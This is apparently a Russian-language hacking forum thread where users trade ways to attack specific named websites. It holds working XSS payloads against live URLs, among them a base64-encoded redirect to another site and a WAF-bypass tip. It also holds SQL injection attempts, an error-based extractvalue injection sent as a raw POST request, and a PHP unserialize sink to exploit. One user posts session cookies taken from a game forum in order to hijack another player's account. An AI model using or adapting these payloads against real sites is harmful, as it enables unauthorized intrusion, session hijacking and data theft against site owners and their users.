Ваши вопросы по уязвимостям.

Вот так работает:

Code:

http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%3EsetTimeout%28%22alert%28123%29%22,1000%29;%3C/script%3E%3Ca%20x=%22

Связано это с тем, что происходит назначение window.alert=function(text){$.DF.Popup.open из файла http://100ads.net/scripts/df.js и в это же самое время мы вызываем функцию алерт. Если добавить таймаут все ок

 

Спрашивал с одного форума и вот что говорят,цитирую : "Он явно посчитал page за число и каким-то образом сделал из него -1, умножив затем на количество элементов, которые нужно достать, получив offset равный -7. Я полагаю, там (int) $_GET['page'], а дальше просто ошибка алгоритма, так что это не инъекция."

 

Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.

Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'

Как быть?

 

Раскрутить не получилось, но XSS получилось.

Code:

xss http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,YWxlcnQoL1hTU1BPU0VELyk=%3E
http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,ZG9jdW1lbnQubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vZm9ydW0uYW50aWNoYXQucnUnOw==%3E

WAF только на формы, обход через Request_Uri

 

если просто в hex? есть вывод?

 

Нет тоже информация не отоброжается

 

concat_ws(0x3a,convert(users%20using%20utf8))
А так ?

 

Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?

 

Покажи ссылку

 

Помогите, попал в тупик.
Вот страница - http://www.ezar.ru/?a=reg
Поле "логин" уязвимое, посылается форма через POST на http://www.ezar.ru/prereg.php , там вылетает Warning: mysql_num_rows()
Что делать дальше? Попробовал подбирать поля, подменяя запросы через Burp, но что то нифига не получается.

 

Пока мы попытаемся помочь Вам из SqlInj, можете поиграться с ихними XSS:

Code:

1)  http://www.ezar.ru/testd.php?domain=ezar.ru&nick=<img/src="x"/onerror=alert(/XSSPOSED/);>

2) url: http://www.ezar.ru/prereg.php
POST: tarif=10&konstrukotor=yes&login=11&nick2=%3Cscript%3Ealert%28%2fXSSPOSED%2f%29%3B%3C%2fscript%3E&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK

Чтобы не мучится с POST, работайте так:

Code:

http://www.ezar.ru/prereg.php?tarif=10&konstrukotor=yes&nick2=nick&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK&login='

 

подскажите как юзнуть ету уязвимость

Code:

PHP Object Injection
Userinput reaches sensitive sink. For more information, press the help icon on the left side.
12: unserialize $data = unserialize($compressed); 
9: $compressed = base64_decode($cookieData); 
8: $cookieData = str_replace('#', '+', $cookieData); 
6: $cookieData = $_COOKIE['___389_shR7_ZeE'];

 

изучите данный материал для начала
https://rdot.org/forum/showthread.php?t=950
http://raz0r.name/tag/unserialize/

 

Code:

POST /calc/save_form/ HTTP/1.1
Host: www.fortun.ru
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.fortun.ru/calc/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

element%5B28|extractvalue(1,concat(0x3a,(select version())))%5D=on

 

Привет всем,нашел атаку на сайте при создание ника можно в поле ника вписывать разные скрипты и все робит,допустим вписываю ява скрипт алерт и сообщение вылазит везде где отображается мой ник и еще когда захожу в админ панель и там скрипт тоже исполняется но собственно сам вопрос как можно взломать сайт при поможи этого?

 

Как пример - почитайте здесь http://forum.antichat.ru/threads/395565/

 

Да там куки почему то на сайте не подмениваются

 

Поставьте вопрос более конкретно, с описанием всех Ваших действий

 

Привет всем,вот мне приходят куки с форума игры.
------------------------------------------------------------------------------------------------------
w2vL_cca8_lastvisit=1437004847;
w2vL_cca8_nofavfid=1;
PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;
w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc7NidwNkrv05%2F53l2Qado4EaUbTuI;
w2vL_cca8_lastcheckfeed=21728%7C1437560824;
w2vL_cca8_visitedfid=45D46D53D2;
w2vL_cca8_viewid=tid_6189;
w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_1437524926D_46_1437525191D_45_1437561663;
w2vL_cca8_smile=1D1;
__zlcmid=Vienkp6pQjrijA;
_ga=GA1.2.956537111.1436906922F;
w2vL_cca8_lastact=1437566946%09forum.php%09;
w2vL_cca8_onlineusernum=59;
w2vL_cca8_sid=ro6N6g
------------------------------------------------------------------------------------------------------
Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса.
------------------------------------------------------------------------------------------------------
1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3
2)_ga=GA1.2.956537111.1436906922F
------------------------------------------------------------------------------------------------------
Но когда заменяю на форуме ,куки не подмениваются.
------------------------------------------------------------------------------------------------------
Сайт выглядит такого типа www.site.ru/forum/forum.php
На www.site.ru расположен профиль игрока,тут короче выбираешь сервер и играешь.
На /forum/forum.php расположен мой ява скрипт но подмена куки почему то тут не робит.
В чем может быть проблема?

 

Обычно с тем что там разные профили при регистрации, разные движки и базы данных.